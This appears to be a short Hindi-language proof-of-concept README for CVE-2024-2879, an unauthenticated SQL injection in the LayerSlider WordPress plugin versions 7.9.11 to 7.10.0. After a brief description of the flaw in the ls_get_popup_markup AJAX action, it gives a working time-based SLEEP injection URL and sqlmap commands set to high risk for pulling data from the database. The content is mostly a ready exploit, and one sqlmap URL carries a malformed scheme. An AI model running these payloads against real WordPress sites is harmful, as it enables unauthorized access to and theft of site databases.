
सीवीई-2024-2879 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: लेयरस्लाइडर वर्डप्रेस प्लगइन (7.9.11-7.10.0) में बिना प्रमाणीकरण के SQL इंजेक्शन। इसमें डेटाबेस जानकारी निकालने के लिए स्कैनर स्क्रिप्ट और SQLMap शोषण मार्गदर्शिका शामिल है।
LayerSlider 7.9.11 - 7.10.0 - अप्रमाणित SQL इंजेक्शन
वर्डप्रेस के लिए LayerSlider प्लगइन, संस्करण 7.9.11 और 7.10.0 में, ls_get_popup_markup कार्रवाई के माध्यम से SQL इंजेक्शन के लिए संवेदनशील है, जो उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी की कमी के कारण होता है। इससे अप्रमाणित हमलावरों के लिए मौजूदा क्वेरी में अतिरिक्त SQL क्वेरी जोड़ना संभव हो जाता है, जिनका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
5 सेकंड विलंब प्रतिक्रिया समय

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
या
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T